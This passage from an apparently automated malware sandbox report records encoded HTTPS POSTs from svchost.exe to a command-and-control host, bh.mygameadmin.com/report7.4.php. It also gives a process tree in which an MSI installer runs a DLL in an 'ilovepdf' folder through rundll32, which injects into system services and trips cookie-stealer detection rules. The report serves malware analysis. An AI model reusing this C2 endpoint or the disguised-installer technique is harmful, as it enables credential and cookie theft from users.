                                                                                  2021-10-24 10:50:06 UTC1OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 58 31 4e 61 69 31 39 62 66 6f 74 65 6f 71 61 4b 70 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 34 66 66 33 4a 6d 74 6d 71 69 71 31 71 75 71 31 39 61 48 71 4e 79 71 68 39 61 47 31 4b 75 70 6d 39 24 66 6d 71 32 47 68 70 69 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 63 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 64 70 71 43 6b 70 6d 69 66 6c
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:07 UTC1INHTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:07 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z6hUjLumL9CnwY4P8w5uIjqoOwpKUS1DgjCVcTv6q4LTeqn2T%2FhuwPLK4yZM81PbWzttV8PlbDYtQQKcoxFizdU5vAxrou1x8DtbL%2FCs8csw%2Fxw9kqeJG6mZZwkJqHkGLQ0Oh3s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a47199059aaa-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:07 UTC2INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                  Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:07 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  2192.168.2.349808104.21.75.46443C:\Windows\System32\svchost.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2021-10-24 10:50:07 UTC2OUTPOST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:07 UTC3OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 58 31 4e 61 69 31 39 62 66 6f 74 65 6f 71 61 4b 70 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 34 66 66 33 4a 6d 74 6d 71 69 71 31 71 75 71 31 39 61 48 71 4e 79 71 68 39 61 47 31 4b 75 70 6d 39 24 66 6d 71 32 47 68 70 69 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 63 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 64 70 71 43 6b 70 6d 69 66 6c
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:08 UTC3INHTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:08 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uLAFwLXyGPPDeDuTzEAYGTNoP%2BrU2Rqu9VpwcvV%2FJnmPEaI4h5e9piw6UviyVP4NEDEBDeNTDtm0K1P%2FY9sCQY1xYRS6zGI8WpUJuoWo6e6pvRs%2BTJrrA1SSwHLkJkBjCRfy5xY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a4752cfb074a-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:08 UTC4INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                  Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:08 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  3192.168.2.349811104.21.75.46443C:\Windows\System32\svchost.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2021-10-24 10:50:09 UTC4OUTPOST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 558
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:09 UTC4OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 73 5a 47 6d 68 70 5a 6c 62 57 6c 37 6c 71 62 65 70 4b 61 5a 62 4a 5a 6c 59 33 75 6d 6f 4b 53 6d 6d 57 56 6c 59 57 39 37 61 61 62 65 70 4b 61 43 6a 35 6a 54 31 74 53 6f 30 37 35 6d 6e 39 65 55 5a 36 69 43 6c 33 6d 38 69 6d 6d 50 6e 5a 75 31 71 62 35 6a 5a 34 36 66 5a 71 70 74 65 4e 53 66 61 4a 6c 37 61 4c 79 48 6e 59 65 24 6e 35 6d 63 6c 32 6e 57 5a 59 61 74 6e 57 4b 50 71 5a 52 39 6e 32 79 59 6c 34 6d 41 6c 47 43 62 69 32 5a 34 71 34 46 6f 6d 47 4f 61 61 32 6a 66 74 62 36 4c 6d 61 68 37 71 70 65 4c 69 5a 65 46 6a 70 69 70 61 4e 65 38 31 37 65 65 76 71 71 62 6d
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6ksZGmhpZlbWl7lqbepKaZbJZlY3umoKSmmWVlYW97aabepKaCj5jT1tSo075mn9eUZ6iCl3m8immPnZu1qb5jZ46fZqpteNSfaJl7aLyHnYe$n5mcl2nWZYatnWKPqZR9n2yYl4mAlGCbi2Z4q4FomGOaa2jftb6Lmah7qpeLiZeFjpipaNe817eevqqbm
                                                                                  2021-10-24 10:50:09 UTC5INHTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:09 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EVQwNj3Kap4FKLvdJMaAtg9Mz9%2FrrG69k9B9uH4wfGH0wqgI%2BrFnZqFfS%2BpV1OEcCq3eMbq5FgqJqwhhZsDyPjerzbvG3%2FTIEcnfCSOxOWrLN5fk37Y%2BMT2OV5FHz0phpySXAbA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a47f3c4d1756-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:09 UTC5INData Raw: 33 33 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 5b 5d 7d 0d 0a
                                                                                  Data Ascii: 33{"host":[],"spacing":1800,"spacing2":120,"data":[]}
                                                                                  2021-10-24 10:50:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  4192.168.2.349812104.21.75.46443C:\Windows\System32\svchost.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2021-10-24 10:50:09 UTC5OUTPOST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 254
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:09 UTC6OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 5a 70 61 47 64 6f 65 36 62 65 70 4b 75 54 6f 4b 53 6d 62 35 53 6d 33 71 53 6d 31 39 54 57 6f 74 66 57 33 36 4c 58 71 4b 6d 69 71 61 6d 6d 6f 4b 53 6d 59 32 64 35 62 47 39 69 65 32 39 34 70 74 36 6b 70 71 75 48 33 39 79 5a 72 5a 71 6f 71 74 61 72 71 74 66 57 68 36 6a 63 71 6f 66 57 68 74 53 72 71 5a 76 66 33 35 71 74 68 6f 61 59 70 71 43 6b 70 6d 4e 71 65 35 61 6d 33 71 53 6d 33 4b 4c 66 70 71 43 6b 70 70 5a 37 66 57 39 6c 59 71 62 65 70 4b 61 40 6e 61 61 67 70 4b 5a 6f 6e 35 52 37 70 74 36 6b 71 36 43 6b 70 6d 70 37 6c 71 62 65 70 4b 6e 57 6b 77 3d 3d
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaZpaGdoe6bepKuToKSmb5Sm3qSm19TWotfW36LXqKmiqammoKSmY2d5bG9ie294pt6kpquH39yZrZqoqtarqtfWh6jcqofWhtSrqZvf35qthoaYpqCkpmNqe5am3qSm3KLfpqCkppZ7fW9lYqbepKa@naagpKZon5R7pt6kq6Ckpmp7lqbepKnWkw==
                                                                                  2021-10-24 10:50:10 UTC6INHTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:10 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=68TwEML4Cj7sr1PqJIQznNgRxV0YJLB%2FVClWpmfGY%2BZBID3jAMRjNo3X0iHULIZ1iakt4GBHxNqyGwnuU5LL9UfYzuDL2HtEJtOhLokMJjLeK4PIwNbJdMzMUjcJOG05sseGpDs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a48489c84a85-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:10 UTC7INData Raw: 34 65 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 2c 22 63 6b 22 3a 5b 5d 2c 22 69 6e 73 63 6b 22 3a 5b 5d 7d 7d 0d 0a
                                                                                  Data Ascii: 4e{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1,"ck":[],"insck":[]}}
                                                                                  2021-10-24 10:50:10 UTC7INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  Analysis Process: msiexec.exe PID: 6980 Parent PID: 4448

                                                                                  General

                                                                                  Start time:12:49:02
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi'
                                                                                  Imagebase:0x7ff7a5c50000
                                                                                  File size:66048 bytes
                                                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: msiexec.exe PID: 7056 Parent PID: 572

                                                                                  General

                                                                                  Start time:12:49:02
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                  Imagebase:0x7ff7a5c50000
                                                                                  File size:66048 bytes
                                                                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: MSIFBC3.tmp PID: 4928 Parent PID: 7056

                                                                                  General

                                                                                  Start time:12:49:07
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\Installer\MSIFBC3.tmp
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\Installer\MSIFBC3.tmp
                                                                                  Imagebase:0x400000
                                                                                  File size:7196212 bytes
                                                                                  MD5 hash:B6D7559D31D4FF2D02338DF9CEF2FBD8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Reputation:low

                                                                                  Analysis Process: MSIFBC3.tmp PID: 6292 Parent PID: 4928

                                                                                  General

                                                                                  Start time:12:49:08
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'
                                                                                  Imagebase:0x400000
                                                                                  File size:3014144 bytes
                                                                                  MD5 hash:D73DDB8F6B777CC6411FD3CA254F3DEC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Reputation:low

                                                                                  Analysis Process: rundll32.exe PID: 5336 Parent PID: 6292

                                                                                  General

                                                                                  Start time:12:49:23
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
                                                                                  Imagebase:0xb00000
                                                                                  File size:61952 bytes
                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.415787297.0000000004D00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 2968 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:24
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000003.327914667.0000024B7D060000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000000.328311763.0000024B7D0D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 6944 Parent PID: 2968

                                                                                  General

                                                                                  Start time:12:49:25
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.814263097.0000012E17674000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.423845789.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.341269563.0000012E17682000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.423609117.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.428213354.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_CookieStealer, Description: Yara detected Cookie Stealer, Source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.425960077.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422182454.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.818890783.0000012E17800000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.347751954.0000012E17682000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_CookieStealer, Description: Yara detected Cookie Stealer, Source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.822239151.0000012E17870000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422945945.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422081412.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 6212 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:25
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000000.334220088.00000204F3380000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000002.535149996.00000204F3380000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000003.332207196.00000204F3310000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 996 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:28
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000000.337739160.00000233426D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000003.337258636.0000023342660000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000002.814492712.00000233426D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 256 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:30
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000002.813792020.000001D91AAD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000000.341208175.000001D91AAD0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 2320 Parent PID: 5336

                                                                                  General

                                                                                  Start time:12:49:31
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000002.823826621.000002F2C5C00000.00000040.00000001.sdmp, Author: Florian Roth
